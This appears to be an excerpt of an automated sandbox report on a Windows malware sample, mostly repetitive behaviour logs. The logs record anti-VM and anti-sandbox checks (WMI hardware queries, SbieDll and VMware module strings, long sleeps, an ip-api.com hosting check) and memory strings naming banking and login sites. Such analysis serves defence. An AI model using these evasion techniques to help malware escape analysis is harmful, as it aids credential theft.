Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe PID: 6580, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002856000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Memory allocated: AB0000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Memory allocated: 1A640000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 599871	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 599653	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 599536	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 599296	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 598935	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 598753	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Window / User API: threadDelayed 1218			Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Window / User API: threadDelayed 2053			Jump to behavior

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 2240	Thread sleep count: 1218 > 30	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -599871s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 2240	Thread sleep count: 2053 > 30	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -599653s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -599536s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -599406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -599296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -598935s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -598753s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -598516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -598188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -597938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 3972	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 7152	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe TID: 5860	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 599871	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 599653	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 599536	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 599296	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 598935	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 598753	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: tmpB998.tmp.dat.2.dr	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002856000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002856000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMToolsHook.dll
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: global block list test formVMware20,11696497155
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002856000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmmousever.dll
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002856000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmmousever
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Binary or memory string: soqemujujeyorakesix
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VirtualMachine: False
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002856000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VirtualMachine: @E
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002856000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VirtualMachine:
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1532006280.000000001AF71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002856000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Binary or memory string: samonokoqemulef
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: AMC password management pageVMware20,11696497155
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: discord.comVMware20,11696497155f
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: tmpB998.tmp.dat.2.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002856000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMToolsHook

